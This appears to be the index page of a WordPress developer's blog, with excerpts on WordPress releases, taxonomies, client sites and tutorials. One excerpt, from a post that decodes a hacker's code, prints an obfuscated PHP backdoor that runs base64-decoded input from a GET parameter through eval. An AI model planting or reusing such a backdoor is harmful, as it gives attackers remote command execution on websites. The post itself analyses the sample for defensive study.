Skip to content

Why Lightning Quick Ads are the Future of Internet Advertising

If you have anything to do with online advertising I’m sure you want to be as much ninja-skilled with it as possible. You want to have an exceptional ability of attracting attention, conveying your offer, grabbing the reader by the throat and forcing them to take action… just like a real ninja would have done […]

Related Posts:

WordPress 3.2, Beta 1

It seems like just yesterday that we released WordPress 3.1, but it’s actually been almost three months. We’ve spent that time putting together a new release focused on performance improvements, and are ready for our first beta testers! As always, this is software still in development and we don’t recommend that you run it on […]

When to (not) use a Custom Taxonomy

Saw a post over on the WordPress Stack Exchange site a while back, and though I sorta went into it in my answer there, I figured it would make a decent topic. Custom taxonomies are great. But they’re not great for everything. When designing a custom solution, it’s helpful to understand this in advance, so […]

WordPress 3.1.2

WordPress 3.1.2 is now available and is a security release for all previous WordPress versions. This release addresses a vulnerability that allowed Contributor-level users to improperly publish posts. The issue was discovered by a member of our security team, WordPress developer Andrew Nacin, with Benjamin Balter. We suggest you update to 3.1.2 promptly, especially if […]

Recent Work

Some recent contract work just completed, via Immersion Media, a California company; Value Investing Congress ; I updated the jQuery behind the front-page slider to increase the delay for some slides Value Investing Letter; I… 

Decoding a Russian Hacker’s Code

  • by

I was alerted to this tweet by @andrea_r this morning: Here’s the code in question: <?php @$str1 = "0cmVhbT1AJF9HRVRbJz" . $HTTPS_ACCEPT_URLENCODING[‘KOI8-R’]; @$str2 = "B4RkYnXTtAc3lzdGVtK" . $HTTPS_ACCEPT_URLENCODING[‘WIN-1251’]; @$str3 = "CRuZXdzdHJlYW0pOw==" . $HTTP_ACCEPT_URLENCODING[‘UTF-8’]; @eval(base64_decode($_GET[‘salt’] . $str1 . $str2 . $str3)); ?> Decoding this is a rather simple matter. First, we remove the eval line and do a […]

ElisaCachero.com

  • by

This portfolio site is for multi-disciplinary designer Elisa Cachero, and shows her design work in textiles, art direction, print & web design, and event planning. It uses the WordPress engine with the popular portfolio theme Autofocuspro… 

Te Awa

Te Awa | The Great New Zealand River Ride

This site is te-awa.org.nz, The Great New Zealand River Ride, an outdoors project based on New Zealand’s largest rvier, the  Waikato. Urban Legend web was contracted by Cube Media to install and configure wordpress, code… 

Post Formats Presentation

  • by

Slides for the presentation I gave on Post Formats at the WordPress Memphis Meetup yesterday. It was a short presentation, only about 15-20 minutes, really. Post formats simply aren’t that complicated, and tend to be easy to grasp quickly. Link if you can’t see the embedded version above: http://go.otto42.com/uhwrv I followed up showing on a […]

Tutorial: Using the WP_Filesystem

  • by

Lot of talk amongst theme authors recently about writing local files. Writing files from code, whether it be from a theme or from a plugin, is generally bad mojo. However understanding why you shouldn’t is confusing to many, and then understanding why you shouldn’t do-it-yourself and should use the WP_Filesystem is even more confusing. To […]